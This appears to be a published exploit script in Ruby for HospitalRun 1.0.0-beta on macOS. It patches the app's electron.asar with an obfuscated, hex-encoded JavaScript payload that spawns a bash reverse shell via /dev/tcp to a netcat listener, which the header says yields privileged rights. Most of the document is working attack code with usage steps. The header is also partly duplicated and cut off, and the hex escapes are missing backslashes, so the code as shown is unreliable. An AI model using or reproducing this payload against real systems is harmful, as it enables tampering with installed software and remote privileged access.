# Written by Jean Pereira <info@cytres.com>
# Date: 2023/03/04
# Vendor Homepage: https://hospita # Exploit Title: HospitalRun 1.0.0-beta - Local Root Exploit for macOS
# Written by Jean Pereira <info@cytres.com>
# Date: 2023/03/04
# Vendor Homepage: https://hospitalrun.io
# Software Link: https://github.com/HospitalRun/hospitalrun-frontend/releases/download/1.0.0-beta/HospitalRun.dmg
# Version: 1.0.0-beta
# Tested on: macOS Ventura 13.2.1 (22D68)
# Impact: Command Execution, Privilege Escalation
# Instructions:
# Run local TCP listener with (e.g. nc -l 2222)
# Run exploit
# Wait for HospitalRun to be executed
# Profit (privileged rights e.g. root are gained)
# Hotfix: Remove write permissions from electron.asar to patch this vulnerability
# Exploit:
buffer = "x63x6Fx6Ex73x74x20x72x65x6E" +
"x64x65x72x50x72x6Fx63x65x73" +
"x73x50x72x65x66x65x72x65x6E" +
"x63x65x73x20x3Dx20x70x72x6F" +
"x63x65x73x73x2Ex61x74x6Fx6D" +
"x42x69x6Ex64x69x6Ex67x28x27" +
"x72x65x6Ex64x65x72x5Fx70x72" +
"x6Fx63x65x73x73x5Fx70x72x65" +
"x66x65x72x65x6Ex63x65x73x27" +
"x29x2Ex66x6Fx72x41x6Cx6Cx57" +
"x65x62x43x6Fx6Ex74x65x6Ex74" +
"x73x28x29"
payload = "x72x65x71x75x69x72x65x28x22" +
"x63x68x69x6Cx64x5Fx70x72x6F" +
"x63x65x73x73x22x29x2Ex65x78" +
"x65x63x53x79x6Ex63x28x22x2F" +
"x62x69x6Ex2Fx62x61x73x68x20" +
"x2Dx63x20x27x65x78x65x63x20" +
"x62x61x73x68x20x2Dx69x20x3E" +
"x2Fx64x65x76x2Fx74x63x70x2F" +
"x30x2Ex30x2Ex30x2Ex30x2Fx32" +
"x32x32x32x20x30x3Ex26x31x27" +
"x22x29"
nopsled = "x2Fx2Ax2Ax2Ax2A" +
"x2Ax2Ax2Ax2Ax2F"
File.open("/Applications/HospitalRun.app/Contents/Resources/electron.asar", "rb+") do |file|
electron = file.read
electron.gsub!(buffer, payload + nopsled)
file.pos = 0
file.write(electron)
end